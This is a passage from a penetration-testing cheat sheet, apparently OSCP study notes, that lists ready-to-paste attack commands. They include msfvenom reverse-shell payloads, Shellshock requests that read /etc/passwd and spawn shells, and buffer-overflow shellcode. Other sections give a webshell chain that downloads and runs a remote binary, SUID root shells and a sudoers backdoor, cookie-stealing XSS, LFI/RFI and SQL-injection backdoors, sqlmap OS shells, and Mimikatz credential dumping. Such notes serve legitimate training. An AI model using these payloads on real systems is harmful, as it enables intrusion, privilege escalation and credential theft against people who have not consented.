886 | https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-Shellcode.ps1
887 |
888 | - Web Backdoors from Fuzzdb (
889 | https://github.com/fuzzdb-project/fuzzdb/tree/master/web-backdoors
890 |
891 | - Creating Meterpreter Shells with MSFVenom - http://www.securityunlocked.com/2016/01/02/network-security-pentesting/most-useful-msfvenom-payloads/
892 |
893 | *Linux*
894 |
895 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf
896 |
897 | *Windows*
898 |
899 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe
900 |
901 | *Mac*
902 |
903 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho
904 |
905 | **Web Payloads**
906 |
907 | *PHP*
908 |
909 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
910 |
911 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php
912 |
913 | *ASP*
914 |
915 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp
916 |
917 | *JSP*
918 |
919 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
920 |
921 | *WAR*
922 |
923 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
924 |
925 | **Scripting Payloads**
926 |
927 | *Python*
928 |
929 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py
930 |
931 | *Bash*
932 |
933 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh
934 |
935 | *Perl*
936 |
937 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl
938 |
939 | **Shellcode**
940 |
941 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits.
942 |
943 | *Linux Based Shellcode*
944 |
945 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f
946 |
947 | *Windows Based Shellcode*
948 |
949 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f
950 |
951 | *Mac Based Shellcode*
952 |
953 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f
954 |
955 | **Handlers**
956 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format.
957 |
958 | use exploit/multi/handler
959 |
960 | set PAYLOAD
961 |
962 | set LHOST
963 |
964 | set LPORT
965 |
966 | set ExitOnSession false
967 |
968 | exploit -j -z
969 |
970 | Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘
971 |
972 | - SSH to Meterpreter:
973 |
974 | use auxiliary/scanner/ssh/ssh_login
975 |
976 | use post/multi/manage/shell_to_meterpreter
977 |
978 | https://daemonchild.com/2015/08/10/got-ssh-creds-want-meterpreter-try-this/
979 |
980 | - Compiling Windows Exploits on Kali
981 |
982 | - wget -O mingw-get-setup.exe
983 | http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
984 | wine mingw-get-setup.exe
985 | select mingw32-base
986 |
987 | - cd /root/.wine/drive\_c/windows
988 | wget http://gojhonny.com/misc/mingw\_bin.zip && unzip
989 | mingw\_bin.zip
990 | cd /root/.wine/drive\_c/MinGW/bin
991 | wine gcc -o ability.exe /tmp/exploit.c -lwsock32
992 | wine ability.exe
993 |
994 | - Cross Compiling Exploits
995 |
996 | - gcc -m32 -o output32 hello.c (32 bit)
997 | gcc -m64 -o output hello.c (64 bit)
998 |
999 | - Shellshock
1000 |
1001 | - git clone
1002 |
1003 | - ./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c
1004 | /cgi-bin/status --verbose
1005 |
1006 | - Shell Shock SSH Forced Command
1007 | Check for forced command by enabling all debug output with ssh
1008 | ssh -vvv
1009 | ssh -i noob noob@$ip '() { :;}; /bin/bash'
1010 |
1011 | - cat file (view file contents)
1012 | echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {
1013 | :;}; echo \\$(</etc/passwd)\\r\\nHost:
1014 | vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
1015 |
1016 | - Shell Shock run bind shell
1017 | echo -e "HEAD /cgi-bin/status HTTP/1.1\\r\\nUser-Agent: () {
1018 | :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\\r\\nHost:
1019 | vulnerable\\r\\nConnection: close\\r\\n\\r\\n" | nc TARGET 80
1020 |
1021 | - Shell Shock reverse Shell
1022 | nc -l -p 443
1023 |
1024 | - Buffer Overflow Exploits
1025 |
1026 | - Pass 1000 A’s as a parameter
1027 | ./r00t $(python -c 'print "A" \* 1000')
1028 |
1029 | - Random Pattern Create
1030 | /usr/share/metasploit-framework/tools\# ruby pattern\_create.rb
1031 | 1000
1032 |
1033 | - Determine Pattern offset
1034 | ruby pattern\_offset.rb 0x6a413969
1035 |
1036 | - Pass shell with offset value
1037 | env - ./r00t $(python -c 'print "A"\*268 +
1038 | "\\x80\\xfc\\xff\\xbf" + "\\x90"\*16 +
1039 | "\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80"')
1040 | \# id
1041 |
1042 | - From Fuzzing to Zero Day
1043 | https://blog.techorganic.com/2014/05/14/from-fuzzing-to-0-day/
1044 |
1045 | - Nmap Fuzzers:
1046 |
1047 | - NMap Fuzzer List
1048 | [*https://nmap.org/nsedoc/categories/fuzzer.html*](https://nmap.org/nsedoc/categories/fuzzer.html)
1049 |
1050 | - NMap HTTP Form Fuzzer
1051 | nmap --script http-form-fuzzer --script-args
1052 | 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}'
1053 | -p 80 $ip
1054 |
1055 | - Nmap DNS Fuzzer
1056 | nmap --script dns-fuzz --script-args timelimit=2h $ip -d
1057 |
1058 | File Transfers
1059 | ============================================================================================================
1060 |
1061 | - Post exploitation refers to the actions performed by an attacker,
1062 | once some level of control has been gained on his target.
1063 |
1064 | - Simple Local Web Servers
1065 |
1066 | - Run a basic http server, great for serving up shells etc
1067 | python -m SimpleHTTPServer 80
1068 |
1069 | - Run a basic Python3 http server, great for serving up shells
1070 | etc
1071 | python3 -m http.server
1072 |
1073 | - Run a ruby webrick basic http server
1074 | ruby -rwebrick -e "WEBrick::HTTPServer.new
1075 | (:Port => 80, :DocumentRoot => Dir.pwd).start"
1076 |
1077 | - Run a basic PHP http server
1078 | php -S $ip:80
1079 |
1080 | - Creating a wget VB Script on Windows:
1081 | [*https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt*](https://github.com/erik1o6/oscp/blob/master/wget-vbs-win.txt)
1082 |
1083 | - Mounting File Shares
1084 |
1085 | - Mount NFS share to /mnt/nfs
1086 | mount $ip:/vol/share /mnt/nfs
1087 |
1088 | - HTTP Put
1089 | nmap -p80 $ip --script http-put --script-args
1090 | http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php
1091 |
1092 | - Uploading Files
1093 | -------------------------------------------------------------------------------------------------------------
1094 |
1095 | - SCP
1096 |
1097 | scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2
1098 |
1099 | scp localfile username@$ip:~/Folder/
1100 |
1101 | - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor
1102 |
1103 | `davtest -move -sendbd auto -url http://$ip`
1104 |
1105 | https://github.com/cldrn/davtest
1106 |
1107 | You can also upload a file using the PUT method with the curl command:
1108 |
1109 | `curl -T 'leetshellz.txt' 'http://$ip'`
1110 |
1111 | And rename it to an executable file using the MOVE method with the curl command:
1112 |
1113 | `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'`
1114 |
1115 | - Upload shell using limited php shell cmd
1116 | use the webshell to download and execute the meterpreter
1117 | \[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O
1118 | /tmp/evil" http://$ip/files/sh.php
1119 | \[curl -s --data "cmd=chmod 777 /tmp/evil"
1120 | http://$ip/files/sh.php
1121 | curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php
1122 |
1123 | - TFTP
1124 | mkdir /tftp
1125 | atftpd --daemon --port 69 /tftp
1126 | cp /usr/share/windows-binaries/nc.exe /tftp/
1127 | EX. FROM WINDOWS HOST:
1128 | C:\\Users\\Offsec>tftp -i $ip get nc.exe
1129 |
1130 | - FTP
1131 | apt-get update && apt-get install pure-ftpd
1132 |
1133 | \#!/bin/bash
1134 | groupadd ftpgroup
1135 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser
1136 | pure-pw useradd offsec -u ftpuser -d /ftphome
1137 | pure-pw mkdb
1138 | cd /etc/pure-ftpd/auth/
1139 | ln -s ../conf/PureDB 60pdb
1140 | mkdir -p /ftphome
1141 | chown -R ftpuser:ftpgroup /ftphome/
1142 |
1143 | /etc/init.d/pure-ftpd restart
1144 |
1145 | - Packing Files
1146 | -------------------------------------------------------------------------------------------------------------
1147 |
1148 | - Ultimate Packer for eXecutables
1149 | upx -9 nc.exe
1150 |
1151 | - exe2bat - Converts EXE to a text file that can be copied and
1152 | pasted
1153 | locate exe2bat
1154 | wine exe2bat.exe nc.exe nc.txt
1155 |
1156 | - Veil - Evasion Framework -
1157 | https://github.com/Veil-Framework/Veil-Evasion
1158 | apt-get -y install git
1159 | git clone https://github.com/Veil-Framework/Veil-Evasion.git
1160 | cd Veil-Evasion/
1161 | cd setup
1162 | setup.sh -c
1163 |
1164 | Privilege Escalation
1165 | ==================================================================================================================
1166 |
1167 | - Linux Privilege Escalation
1168 | ------------------------------------------------------------------------------------------------------------------------
1169 |
1170 | - Try the obvious - Maybe the user can sudo to root:
1171 | sudo su
1172 |
1173 | - Highon.coffee Linux Local Enum
1174 | `wget https://highon.coffee/downloads/linux-local-enum.sh`
1175 |
1176 | - Basic Linux Privilege Escalation
1177 | [*https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/*](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
1178 |
1179 | - Linux Privilege Exploit Suggester
1180 | [*https://github.com/PenturaLabs/Linux\_Exploit\_Suggester*](https://github.com/PenturaLabs/Linux_Exploit_Suggester)
1181 |
1182 | - Linux post exploitation enumeration and exploit checking tools
1183 | [*https://github.com/reider-roque/linpostexp*](https://github.com/reider-roque/linpostexp)
1184 |
1185 | - CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8
1186 | [*https://www.exploit-db.com/exploits/15285/*](https://www.exploit-db.com/exploits/15285/)
1187 |
1188 | - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo
1189 | / Ubuntu x86/x64)
1190 | [*https://git.zx2c4.com/CVE-2012-0056/about/*](https://git.zx2c4.com/CVE-2012-0056/about/)
1191 | Linux CVE 2012-0056
1192 | wget -O exploit.c
1193 | gcc -o mempodipper exploit.c
1194 | ./mempodipper
1195 |
1196 | - CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux
1197 | Kernel <= 3.19.0-73.8
1198 | [*https://dirtycow.ninja/*](https://dirtycow.ninja/)
1199 | First existed on 2.6.22 (released in 2007) and was fixed on Oct 18,
1200 | 2016
1201 | ./cow32
1202 | DirtyCow root privilege escalation
1203 | Backing up /usr/bin/passwd.. to /tmp/bak
1204 | Size of binary: 45420
1205 | Racing, this may take a while..
1206 | thread stopped
1207 | thread stopped
1208 | /usr/bin/passwd is overwritten
1209 | Popping root shell.
1210 |
1211 | - Run a command as a user other than root
1212 | sudo -u waldo /usr/bin/vim
1213 | /etc/apache2/sites-available/000-default.conf
1214 |
1215 | - Add a user or change a password
1216 | /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor
1217 | echo thePassword | passwd haxzor --stdin
1218 |
1219 | - Local Privilege Escalation Exploit in Linux
1220 |
1221 | - **SUID** (**S**et owner **U**ser **ID** up on execution)
1222 | Often SUID C binary files are required to spawn a shell as a
1223 | superuser, you can update the UID / GID and shell as required.
1224 |
1225 | below are some quick copy and paste examples for various
1226 | shells:
1227 |
1228 | SUID C Shell for /bin/bash
1229 |
1230 | int main(void){
1231 | setresuid(0, 0, 0);
1232 | system("/bin/bash");
1233 | }
1234 |
1235 | SUID C Shell for /bin/sh
1236 |
1237 | int main(void){
1238 | setresuid(0, 0, 0);
1239 | system("/bin/sh");
1240 | }
1241 |
1242 | Building the SUID Shell binary
1243 | gcc -o suid suid.c
1244 | For 32 bit:
1245 | gcc -m32 -o suid suid.c
1246 |
1247 | - Create and compile an SUID from a limited shell (no file
1248 | transfer)
1249 | echo "int main(void){\\nsetgid(0);
1250 | setuid(0);\\nsystem(\\"/bin/sh\\");\\n}" >privsc.c
1251 | gcc privsc.c -o privsc
1252 |
1253 | - Add users to Root SUDO group with no password requirement
1254 | echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:
1255 | ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' >
1256 | /tmp/update
1257 |
1258 | - SearchSploit
1259 | searchsploit –uncsearchsploit apache 2.2
1260 | searchsploit "Linux Kernel"
1261 | searchsploit linux 2.6 | grep -i ubuntu | grep local
1262 | searchsploit slmail
1263 |
1264 | - Kernel Exploit Suggestions for Kernel Version 3.0.0
1265 | ./usr/share/linux-exploit-suggester/Linux\_Exploit\_Suggester.pl -k 3.0.0
1266 |
1267 | - Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!***
1268 |
1269 | [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/)
1270 |
1271 | - Collect root password
1272 | cat /etc/shadow |grep root
1273 |
1274 | - Find and display the proof.txt or flag.txt - LOOT!
1275 | `cat ``find / -name proof.txt -print```
1276 |
1277 | - Windows Privilege Escalation
1278 | --------------------------------------------------------------------------------------------------------------------------
1279 |
1280 | - Windows Privilege Escalation resource
1281 | http://www.fuzzysecurity.com/tutorials/16.html
1282 |
1283 | - Try the getsystem command using meterpreter - rarely works but is worth a try.
1284 | `meterpreter > getsystem`
1285 |
1286 | - Metasploit Meterpreter Privilege Escalation Guide
1287 | https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
1288 |
1289 | - Windows MS11-080 - http://www.exploit-db.com/exploits/18176/
1290 | python pyinstaller.py --onefile ms11-080.py
1291 | mx11-080.exe -O XP
1292 |
1293 | - Powershell Priv Escalation Tools
1294 | https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
1295 |
1296 | - Windows Service Configuration Viewer - Check for misconfigurations
1297 | in services that can lead to privilege escalation. You can replace
1298 | the executable with your own and have windows execute whatever code
1299 | you want as the privileged user.
1300 | icacls scsiaccess.exe
1301 |
1302 | > scsiaccess.exe
1303 | > NT AUTHORITY\\SYSTEM:(I)(F)
1304 | > BUILTIN\\Administrators:(I)(F)
1305 | > BUILTIN\\Users:(I)(RX)
1306 | > APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)
1307 | > Everyone:(I)(F)
1308 |
1309 | - Compile a custom add user command in windows using C
1310 | root@kali:~\# cat useradd.c
1311 | \#include <stdlib.h> /\* system, NULL, EXIT\_FAILURE \*/
1312 | int main ()
1313 | {
1314 | int i;
1315 | i=system ("net localgroup administrators low /add");
1316 | return 0;
1317 | }
1318 |
1319 | i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
1320 |
1321 | - Group Policy Preferences (GPP)
1322 | A common useful misconfiguration found in modern domain environments
1323 | is unprotected Windows GPP settings files
1324 |
1325 | - map the Domain controller SYSVOL share
1326 | net use z: \\\\dc01\\SYSVOL
1327 |
1328 | - Find the GPP file: Groups.xml
1329 | dir /s Groups.xml
1330 |
1331 | - Review the contents for passwords
1332 | type Groups.xml
1333 |
1334 | - Decrypt using GPP Decrypt
1335 | gpp-decrypt
1336 | riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB
1337 |
1338 | - Find and display the proof.txt or flag.txt - get the loot!
1339 | `#meterpreter > run post/windows/gather/win_privs`
1340 |
1341 | `cd\ & dir /b /s proof.txt`
1342 | `type c:\pathto\proof.txt`
1343 |
1344 |
1345 | Client, Web and Password Attacks
1346 | ==============================================================================================================================
1347 |
1348 | - Client Attacks
1349 | ------------------------------------------------------------------------------------------------------------
1350 |
1351 | - MS12-037- Internet Explorer 8 Fixed Col Span ID
1352 | wget -O exploit.html
1353 |
1354 | service apache2 start
1355 |
1356 | - JAVA Signed Jar client side attack
1357 | echo '<applet width="1" height="1" id="Java Secure"
1358 | code="Java.class" archive="SignedJava.jar"><param name="1"
1359 | value="http://$ip:80/evil.exe"></applet>' >
1360 | /var/www/html/java.html
1361 | User must hit run on the popup that occurs.
1362 |
1363 | - Linux Client Shells
1364 | [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)
1365 |
1366 | - Setting up the Client Side Exploit
1367 |
1368 | - Swapping Out the Shellcode
1369 |
1370 | - Injecting a Backdoor Shell into Plink.exe
1371 | backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip
1372 | -P 4444 -s reverse\_shell\_tcp
1373 |
1374 | - Web Attacks
1375 | ---------------------------------------------------------------------------------------------------------
1376 |
1377 | - Web Shag Web Application Vulnerability Assessment Platform
1378 | webshag-gui
1379 |
1380 | - Web Shells
1381 | [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells)
1382 | ls -l /usr/share/webshells/
1383 |
1384 | - Generate a PHP backdoor (generate) protected with the given
1385 | password (s3cr3t)
1386 | weevely generate s3cr3t
1387 | weevely http://$ip/weevely.php s3cr3t
1388 |
1389 | - Java Signed Applet Attack
1390 |
1391 | - HTTP / HTTPS Webserver Enumeration
1392 |
1393 | - OWASP Dirbuster
1394 |
1395 | - nikto -h $ip
1396 |
1397 | - Essential Iceweasel Add-ons
1398 | Cookies Manager
1399 | https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/
1400 | Tamper Data
1401 | https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
1402 |
1403 | - Cross Site Scripting (XSS)
1404 | significant impacts, such as cookie stealing and authentication
1405 | bypass, redirecting the victim’s browser to a malicious HTML
1406 | page, and more
1407 |
1408 | - Browser Redirection and IFRAME Injection
1409 | <iframe SRC="http://$ip/report" height = "0" width
1410 | ="0"></iframe>
1411 |
1412 | - Stealing Cookies and Session Information
1413 | <script>
1414 | new
1415 | image().src="http://$ip/bogus.php?output="+document.cookie;
1416 | </script>
1417 | nc -nlvp 80
1418 |
1419 | - File Inclusion Vulnerabilities
1420 | -----------------------------------------------------------------------------------------------------------------------------
1421 |
1422 | - Local (LFI) and remote (RFI) file inclusion vulnerabilities are
1423 | commonly found in poorly written PHP code.
1424 |
1425 | - fimap - There is a Python tool called fimap which can be
1426 | leveraged to automate the exploitation of LFI/RFI
1427 | vulnerabilities that are found in PHP (sqlmap for LFI):
1428 | [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)
1429 |
1430 | - Gaining a shell from phpinfo()
1431 | fimap + phpinfo() Exploit - If a phpinfo() file is present,
1432 | it’s usually possible to get a shell, if you don’t know the
1433 | location of the phpinfo file fimap can probe for it, or you
1434 | could use a tool like OWASP DirBuster.
1435 |
1436 | - For Local File Inclusions look for the include() function in PHP
1437 | code.
1438 | include("lang/".$\_COOKIE\['lang'\]);
1439 | include($\_GET\['page'\].".php");
1440 |
1441 | - LFI - Encode and Decode a file using base64
1442 | curl -s
1443 | http://$ip/?page=php://filter/convert.base64-encode/resource=index
1444 | | grep -e '\[^\\ \]\\{40,\\}' | base64 -d
1445 |
1446 | - LFI - Download file with base 64 encoding
1447 | [*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank)
1448 |
1449 | - LFI Linux Files:
1450 | /etc/issue
1451 | /proc/version
1452 | /etc/profile
1453 | /etc/passwd
1454 | /etc/passwd
1455 | /etc/shadow
1456 | /root/.bash\_history
1457 | /var/log/dmessage
1458 | /var/mail/root
1459 | /var/spool/cron/crontabs/root
1460 |
1461 | - LFI Windows Files:
1462 | %SYSTEMROOT%\\repair\\system
1463 | %SYSTEMROOT%\\repair\\SAM
1464 | %SYSTEMROOT%\\repair\\SAM
1465 | %WINDIR%\\win.ini
1466 | %SYSTEMDRIVE%\\boot.ini
1467 | %WINDIR%\\Panther\\sysprep.inf
1468 | %WINDIR%\\system32\\config\\AppEvent.Evt
1469 |
1470 | - LFI OSX Files:
1471 | /etc/fstab
1472 | /etc/master.passwd
1473 | /etc/resolv.conf
1474 | /etc/sudoers
1475 | /etc/sysctl.conf
1476 |
1477 | - LFI - Download passwords file
1478 | [*http://$ip/index.php?page=/etc/passwd*](about:blank)
1479 | [*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)
1480 |
1481 | - LFI - Download passwords file with filter evasion
1482 | [*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)
1483 |
1484 | - Local File Inclusion - In versions of PHP below 5.3 we can
1485 | terminate with null byte
1486 | GET
1487 | /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00
1488 |
1489 | - Contaminating Log Files <?php echo
1490 | shell\_exec($\_GET\['cmd'\]);?>
1491 |
1492 | - For a Remote File Inclusion look for php code that is not
1493 | sanitized and passed to the PHP include function and the php.ini
1494 | file must be configured to allow remote files
1495 | /etc/php5/cgi/php.ini - “allow\_url\_fopen” and
1496 | “allow\_url\_include both set to “on”
1497 | include($\_REQUEST\["file"\].".php");
1498 |
1499 | - Remote File Inclusion
1500 | [http://$ip/addguestbook.php?name=a&comment=b&LANG=http://$localip/evil.txt](http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt)
1501 | <?php echo shell\_exec("ipconfig");?>
1502 |
1503 | - Database Vulnerabilities
1504 | ----------------------------------------------------------------------------------------------------------------------
1505 |
1506 | - MySQL SQL
1507 |
1508 | - Grab password hashes from a web application mysql database
1509 | called “Users” - once you have the MySQL root username and
1510 | password
1511 | mysql -u root -p -h $ip
1512 | use "Users"
1513 | show tables;
1514 | select \* from users;
1515 |
1516 | - Authentication Bypass
1517 | name='wronguser' or 1=1;\#
1518 | name='wronguser' or 1=1 LIMIT 1;\#
1519 |
1520 | - Enumerating the Database
1521 | [http://$ip/comment.php?id=738](http://192.168.11.35/comment.php?id=738)’
1522 | Verbose error message?
1523 | http://$ip/comment.php?id=738 order by 1
1524 | http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6
1525 | Determine MySQL Version:
1526 | http://$ip/comment.php?id=738 union all select
1527 | 1,2,3,4,@@version,6
1528 | current user being used for the database connection
1529 | http://$ip/comment.php?id=738 union all select
1530 | 1,2,3,4,user(),6
1531 | we can enumerate database tables and column structures
1532 | http://$ip/comment.php?id=738 union all select
1533 | 1,2,3,4,table\_name,6 FROM information\_schema.tables
1534 | target the users table in the database
1535 | http://$ip/comment.php?id=738 union all select
1536 | 1,2,3,4,column\_name,6 FROM information\_schema.columns where
1537 | table\_name='users'
1538 | extract the name and password
1539 | http://$ip/comment.php?id=738 union select
1540 | 1,2,3,4,concat(name,0x3a, password),6 FROM users
1541 | Create a backdoor
1542 | http://$ip/comment.php?id=738 union all select 1,2,3,4,"<?php
1543 | echo shell\_exec($\_GET\['cmd'\]);?>",6 into OUTFILE
1544 | 'c:/xampp/htdocs/backdoor.php'
1545 |
1546 | - SQLMap Examples
1547 |
1548 | - Crawl the links
1549 | sqlmap -u http://$ip --crawl=1
1550 | sqlmap -u http://meh.com --forms --batch --crawl=10
1551 | --cookie=jsessionid=54321 --level=5 --risk=3
1552 | - SQLMap Search for databases against a suspected GET SQL Injection
1553 | point ‘search’**
1554 | sqlmap –u http://$ip/blog/index.php?search –dbs
1555 |
1556 | - SQLMap dump tables from database oscommerce at GET SQL injection point ‘search’
1557 | sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables
1558 | –dumps
1559 | - SQLMap GET Parameter command
1560 | sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump
1561 | -threads=5
1562 | - SQLMap Post Username parameter
1563 | sqlmap -u http://$ip/login.php --method=POST
1564 | --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3
1565 | --level=5 --dbms=MySQL --dump-all
1566 | - SQL Map OS Shell
1567 | sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell
1568 | sqlmap -u http://$ip/login.php --method=POST
1569 | --data="usermail=asc@dsd.com&password=1231" -p "usermail" --risk=3
1570 | --level=5 --dbms=MySQL --os-shell
1571 | - Automated sqlmap scan
1572 | sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
1573 | --level=3 --current-user --current-db --passwords
1574 | --file-read="/var/www/blah.php"
1575 | - Targeted sqlmap scan
1576 | sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump
1577 | - Scan url for union + error based injection with mysql backend
1578 | and use a random user agent + database dump
1579 | sqlmap -o -u http://$ip/index.php --forms --dbs
1580 | sqlmap -o -u "http://$ip/form/" --forms
1581 | sqlmap check form for injection
1582 | sqlmap -o -u "http://$ip/vuln-form" --forms -D database-name -T users --dump
1583 | sqlmap dump and crack hashes for table users on database-name.
1584 |
1585 | Enumerate databases
1586 | sqlmap --dbms=mysql -u "$URL" --dbs
1587 | Enumerate tables from a specific database
1588 | sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables
1589 | Dump table data from a specific database and table
1590 | sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump
1591 | Specify parameter to exploit
1592 | sqlmap --dbms=mysql -u
1593 | "http://www.example.com/param1=value1¶m2=value2" --dbs -p param2
1594 | Specify parameter to exploit in 'nice' URIs
1595 | sqlmap --dbms=mysql -u
1596 | "http://www.example.com/param1/value1\*/param2/value2" --dbs \#
1597 | exploits param1
1598 | Get OS shell
1599 | sqlmap --dbms=mysql -u "$URL" --os-shell
1600 | Get SQL shell
1601 | sqlmap --dbms=mysql -u "$URL" --sql-shell
1602 | SQL query
1603 | sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT \*
1604 | FROM $TABLE;"
1605 | Use Tor Socks5 proxy
1606 | sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL"
1607 | --dbs
1608 |
1609 | - Password Attacks
1610 | --------------------------------------------------------------------------------------------------------------
1611 |
1612 | - AES Decryption
1613 | http://aesencryption.net/
1614 |
1615 | - Convert multiple webpages into a word list
1616 | for x in 'index' 'about' 'post' 'contact' ; do curl
1617 | http://$ip/$x.html | html2markdown | tr -s ' ' '\\n' >>
1618 | webapp.txt ; done
1619 |
1620 | - Or convert html to word list dict
1621 | html2dic index.html.out | sort -u > index-html.dict
1622 |
1623 | - Default Usernames and Passwords
1624 |
1625 | - CIRT
1626 | [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)
1627 |
1628 | - Government Security - Default Logins and Passwords for
1629 | Networked Devices
1630 |
1631 | - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)
1632 |
1633 | - Virus.org
1634 | [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)
1635 |
1636 | - Default Password
1637 | [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)
1638 |
1639 | - Brute Force
1640 |
1641 | - Nmap Brute forcing Scripts
1642 | [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)
1643 |
1644 | - Nmap Generic auto detect brute force attack
1645 | nmap --script brute -Pn <target.com or ip>
1646 | <enter>
1647 |
1648 | - MySQL nmap brute force attack
1649 | nmap --script=mysql-brute $ip
1650 |
1651 | - Dictionary Files
1652 |
1653 | - Word lists on Kali
1654 | cd /usr/share/wordlists
1655 |
1656 | - Key-space Brute Force
1657 |
1658 | - crunch 6 6 0123456789ABCDEF -o crunch1.txt
1659 |
1660 | - crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
1661 |
1662 | - crunch 8 8 -t ,@@^^%%%
1663 |
1664 | - Pwdump and Fgdump - Security Accounts Manager (SAM)
1665 |
1666 | - pwdump.exe - attempts to extract password hashes
1667 |
1668 | - fgdump.exe - attempts to kill local antiviruses before
1669 | attempting to dump the password hashes and
1670 | cached credentials.
1671 |
1672 | - Windows Credential Editor (WCE)
1673 |
1674 | - allows one to perform several attacks to obtain clear text
1675 | passwords and hashes
1676 |
1677 | - wce -w
1678 |
1679 | - Mimikatz
1680 |
1681 | - extract plaintexts passwords, hash, PIN code and kerberos
1682 | tickets from memory. mimikatz can also perform
1683 | pass-the-hash, pass-the-ticket or build Golden tickets
1684 | [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)
1685 | From metasploit meterpreter (must have System level access):
1686 | `meterpreter> load mimikatz
1687 | meterpreter> help mimikatz
1688 | meterpreter> msv
1689 | meterpreter> kerberos
1690 | meterpreter> mimikatz_command -f samdump::hashes
1691 | meterpreter> mimikatz_command -f sekurlsa::searchPasswords`
1692 |
1693 | - Password Profiling
1694 |
1695 | - cewl can generate a password list from a web page
1696 | `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`
1697 |
1698 | - Password Mutating
1699 |
